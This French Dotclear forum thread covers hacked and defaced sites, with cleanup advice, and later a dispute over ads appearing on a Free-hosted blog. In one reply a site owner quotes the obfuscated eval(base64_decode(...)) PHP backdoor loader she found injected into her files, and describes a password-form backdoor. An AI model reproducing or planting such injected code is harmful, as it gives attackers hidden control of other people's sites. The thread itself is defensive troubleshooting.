Dotclear

Vous n'êtes pas identifié(e).

Annonce

#1 2009-10-09 06:52:31

Dsls
Modérateur couteau-suisse
Inscription : 2004-11-18
Site Web

[HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Bonjour,

Ce sujet concerne les personnes qui rencontrent des comportements anormaux sur leurs sites web.

Les symptômes
Les symptômes peuvent être de différents types :
* Code non attendu dans les pages du blog, souvent des insertions de code en fin de page, de type iframe
* Site soudainement reconnu comme malveillant par google ou firefox
* Site défacé
* fichiers .php modifiés sur l'espace ftp

Les causes possibles
Toutes les anomalies énumérées ci-dessus peuvent signifier que votre site a été compromis. L'origine de la compromission peut ne pas venir d'une faille de dotclear. Pour rappel, il n'existe à ce jour aucune faille avérée sur la dernière version de dotclear en date (2.1.6).

Depuis quelques temps sévissent des malware qui se installent des espions sur le pc de l'utilisateur. Les activités de ces espions sont :
* Ecoute de communications sur des protocoles particuliers (ftp, par exemple), et capture des informations sensibles (logins, mots de passe)
* Ecoute du clavier (keylogger)

Les malware en question exploitent des failles récentes des plugins des navigateurs web (dont Adobe Flash/PDF) pour s'installer sur le poste de l'utilisateur visé.

Certains de ces malware communiquent le fruit de leur cueillette sur des sites externes, exposant ainsi vos identifiants ftp à d'éventuels pirates. Ces derniers peuvent alors en toute impunité accéder à vos espaces ftp, et modifier leur contenu, par exemple pour y re-progaper le malware. Il a été récemment recensé des vagues d'injection de code dans les index.php des sites, par exemple

Résolution du problème
Avant toute chose, si vous en avez la possibilité, mettez votre site en mode maintenance (désactivation via une console utilisateur, par exemple).
Ensuite, il faut s'assurer que le pc utilisé n'est pas infecté par un malware/trojan :
* Passez votre pc à l'antivirus et à l'antispyware
* Au besoin, faites une passe via hijackthis

Dès que votre pc est "sûr", allez sur l'espace de votre hébergeur, et changez vos mots de passe ftp, et mysql/postgresql.
Effacez les fichiers modifiés sur votre espace ftp, et restaurez-y les fichiers originaux,  puis modifiez le inc/config.php de votre blog pour y mentionner les nouveaux mots de passe.
Enfin, prévenez les éventuels autres utilisateurs ayant les identifiants ftp de votre site de scanner leur pc avant de se reconnecter en ftp sur votre site.

La prévention
* Maintenez vos antivirus/antispyware à jour sur votre PC, le plus régulièrement possible
* Limitez le nombre d'utilisateurs ayant vos identifiants ftp


Dyslexics have more fnu!

Hors ligne

#2 2009-10-09 10:49:52

Moe
Responsable du mini-bar
Lieu : France
Inscription : 2004-09-19
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Dsls a écrit :

* Passez votre pc à l'antivirus et à l'antispyware

Pour cette étape, on peut utiliser un antivirus en ligne : http://housecall.trendmicro.com/fr/

Hors ligne

#3 2009-10-09 11:46:47

pierrevg
Membre
Inscription : 2005-04-13
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Pour hijackthis, voir ici.

Autre scanner en ligne : http://support.kaspersky.com/fr/viruses/online
Pour une analyse du pc entier, cliquer sur :
"Kaspersky
Online Scanner
Cliquez-ici !"

Hors ligne

#4 2010-01-15 09:49:17

Dsls
Modérateur couteau-suisse
Inscription : 2004-11-18
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Un sujet sur les forums OVH est similaire à celui-là :
http://forum.ovh.com/showthread.php?t=49433


Dyslexics have more fnu!

Hors ligne

#5 2010-02-01 11:07:43

annso
Responsable de la machine à Twix
Lieu : Lyon
Inscription : 2006-03-05
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Un des sites que je gère s'est fait pirater : du code malveillant était ajouté au début de chaque fichier

eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzM4L2QyNDY4ODE0OTcvaHRkb2NzL2RvdGNsZWFyL2VjcmlyZS90b29scy9zcGFtcGxlbW91c3NlL3NldHVwL2ZpY2hpZXJzLzEuMi40L3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));

J'ai remis une archive toute propre, vérifié plugins et thèmes et pourtant, je continue d'avoir des comportements bizarres :
Chaque fois que je vais sur une page dont l'url comporte udp=1 (donc chaque fois que je change des settings ou le thème par exemple), j'obtiens une page blanche dont le code source est :

<form action='/dotclear2/admin/blog_theme.php?upd=1' method='POST'><center><input name='dgnnpass' type='password'></center></form>

Je ne comprends pas bien comment cela peut être possible alors que les fichiers sont censés être propre.

Une idée ?

Hors ligne

#6 2010-02-01 11:16:55

annso
Responsable de la machine à Twix
Lieu : Lyon
Inscription : 2006-03-05
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Bon, il suffisait que je poste pour que je trouve le dernier fichier infesté : inc/config.php ...

Hors ligne

#7 2010-02-22 13:08:07

illisible
Membre
Inscription : 2009-07-04

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Il y a eu de récentes attaques qui ressemblent à cela sur des sites qui utilisent le module de stats PHPMyVisites, qu'il est conseillé de mettre à jour d'urgence.
Voir http://www.phpmyvisites.net/
Tous les fichiers php du site sont suceptibles d'être modifié par cette attaque. Vérifier les dates des fichiers.

Hors ligne

#8 2010-03-14 11:14:14

domcorrieras
Membre
Lieu : maizières-les-metz
Inscription : 2007-04-08
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Publicités sur Free, comment les supprimer ?
Bonjour à tous.Un esprit supérieur saurait-il me guider pour supprimer l'apparition des publicités sur mon blog hébergé chez Free ? Et la chose est-elle faisable ?
Je ne supporte pas cette nouvelle intrusion imposée par Free qui certes est en droit de le faire mais aurait pu au moins nous prévenir.
mon blog : http://domcorrieras.free.fr
Merci d'avance
Dom Corrieras

Hors ligne

#9 2010-03-14 11:23:23

Jean-Michel
Modérateur à ailes d'ange
Lieu : Paris
Inscription : 2006-08-22
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

domcorrieras a écrit :

Publicités sur Free, comment les supprimer ?
Bonjour à tous.Un esprit supérieur saurait-il me guider pour supprimer l'apparition des publicités sur mon blog hébergé chez Free ? Et la chose est-elle faisable ?
Je ne supporte pas cette nouvelle intrusion imposée par Free qui certes est en droit de le faire mais aurait pu au moins nous prévenir.
mon blog : http://domcorrieras.free.fr

Bonjour,

J'ai pas assez d'exemples pour le confirmer mais cela ne semble pas s'appliquer à tous. C'est vrai que s'ils oublient de vous prévenir, c'est pas très respectueux comme façon de procéder. Mais je suis assez étonné dont la façon dont se place les publicités.

Hors ligne

#10 2010-03-14 11:31:36

Philippe
Stagiaire
Lieu : Toulon
Inscription : 2004-06-13
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Les publicités dont tu parles sont les adwords Google que l'on trouve dans l'en-tête, le menu de droite et le pied de page ?

C'est bien la première fois que je vois Free ajouter quoi que ce soit aux pages perso...

Hors ligne

#11 2010-03-14 11:58:25

domcorrieras
Membre
Lieu : maizières-les-metz
Inscription : 2007-04-08
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Oui, c'est bien cela. En entête, menu de droite et pied de page. Doit bien y avoir une combine pour s'en débarrasser... nom d'une pipe !

Hors ligne

#12 2010-03-14 12:01:54

Moe
Responsable du mini-bar
Lieu : France
Inscription : 2004-09-19
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Ce n'est pas toi qui as ajouté ces publicités ?

Hors ligne

#13 2010-03-14 12:09:55

domcorrieras
Membre
Lieu : maizières-les-metz
Inscription : 2007-04-08
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Ah non, certainement pas, je m'en passerai bien.

Hors ligne

#14 2010-03-14 12:27:19

Mirovinben
M comme Mathusalem
Lieu : Dole (Jura)
Inscription : 2007-02-06
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Consultation du source de ta page depuis mon navigateur (Firefox) : 6 (!) frames avec des liens vers googleads.g.doubleclic... Ca ne te dit rien ? Tu ne te serais pas abonné récemment à un truc chez google ?

Hors ligne

#15 2010-03-14 12:38:46

Philippe
Stagiaire
Lieu : Toulon
Inscription : 2004-06-13
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

On devrait pouvoir passer par une solution jQuery qui supprime du DOM tous les scripts contenant "google_ad_client = "pub-3839814238443346";" à la fin du chargement de la page, non ?

Hors ligne

#16 2010-03-14 12:40:45

Philippe
Stagiaire
Lieu : Toulon
Inscription : 2004-06-13
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Mirovinben a écrit :

Consultation du source de ta page depuis mon navigateur (Firefox) : 6 (!) frames avec des liens vers googleads.g.doubleclic... Ca ne te dit rien ? Tu ne te serais pas abonné récemment à un truc chez google ?

Il semble que notre ami ne les ait pas ajoutés lui-même. D'ailleurs, un abonnement adwords ne crée pas le code inséré sur les pages sans intervention sur les fichiers ;)

Hors ligne

#17 2010-03-14 12:59:16

Moe
Responsable du mini-bar
Lieu : France
Inscription : 2004-09-19
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

C'est pareil avec le thème par défaut ? J'ai téléchargé un billet directement (sans interprétation de Javascript) et je trouve bien le code de Google dans la source de la page. Ce code a été ajouté dans les fichiers template, il n'est pas ajouté par du code Javascript.

Hors ligne

#18 2010-03-14 13:41:44

domcorrieras
Membre
Lieu : maizières-les-metz
Inscription : 2007-04-08
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Merci à tous de vous pencher sur mon problème, qui je pense n'est pas unique. Mais je confirme ne rien avoir ajouté moi-même, ni que je sache m'être abonné à quoi que ce soit chez Google ou autre. Je crois savoir que c'est Free qui a malicieusement inséré quelque part du code pour afficher des pubs sur les pages perso, mais où et comment faire pour s'en débarrasser, that is the question.

Hors ligne

#19 2010-03-14 13:53:37

Moe
Responsable du mini-bar
Lieu : France
Inscription : 2004-09-19
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Tu as regardé dans tes fichiers de thème ?

Hors ligne

#20 2010-03-14 14:25:17

Philippe
Stagiaire
Lieu : Toulon
Inscription : 2004-06-13
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Peux-tu essayer d'ajouter ceci dans le fichier _head.html de ton thème :

<script type="text/javascript">
//<![CDATA[
$(document).ready(function() {
    $("html").each(function() {
	$(this).find("script").remove(":contains('pub-3839814238443346')")
	});
});
//]]>
</script>

Testé chez moi, le code de pub est bien retiré et ne semble plus être interprété par la suite.

Hors ligne

#21 2010-03-14 14:46:30

Moe
Responsable du mini-bar
Lieu : France
Inscription : 2004-09-19
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Tu veux supprimer les pubs lors de l'affichage mais pourquoi ne pas essayer de les supprimer dans les fichiers template ? J'ai raté un épisode ?

Hors ligne

#22 2010-03-14 14:51:09

Philippe
Stagiaire
Lieu : Toulon
Inscription : 2004-06-13
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Ben il me semble que ces scripts sont ajoutés par Free dans les template (bien que je ne sache pas trop comment) sans que le propriétaire y puisse mais, alors je les retire...

Hors ligne

#23 2010-03-15 09:10:37

domcorrieras
Membre
Lieu : maizières-les-metz
Inscription : 2007-04-08
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Merci Amalgame. Malheureusement d'une part je ne trouve pas ce fichier _head.html dans le répertoire du thème (Noviny). Il y a un fichier user_head.html dans lequel j'ai collé le script, je l'ai également fait dans le fichier home.html... sans que rien ne change. Enfin, en allant dans l'éditeur de thème interne à Dotclear, j'ai effectivement eu accès à _head.html. J'ai ajouté le code, mais rien ne bouge.... Arghhh...

Hors ligne

#24 2010-03-15 13:50:07

domcorrieras
Membre
Lieu : maizières-les-metz
Inscription : 2007-04-08
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

Yes !!! j'ai trouvé dans _head.htm, _top.htmll et dans _footer.html, effectivement des sripts javascript faisant appel à la pub Google et compagnie. J'ai tout viré et ça marche, la pub a disparu sauf dans le menu de droite (side-bar?), et là je n'arrive pas à trouver le fichier correspondant....

Hors ligne

#25 2010-03-15 13:53:07

domcorrieras
Membre
Lieu : maizières-les-metz
Inscription : 2007-04-08
Site Web

Re : [HOWTO] Sites piratés/défacés, fichiers modifiés, code malveillant

... suite. Ceci dit, à l'extrême, celle-ci (la pub dans menu de droite) n'est pas totalement dérangeante. Elle s'insère correctement dans la mise en page, sans rien détruire... mais je m'en passerai quand même. Et une autre question me turlupine. Si Free a mis ça dans mon code, qui les empêchera de recommencer ?

Hors ligne

Vous n'êtes pas identifié(e).

Pied de page des forums

Sites map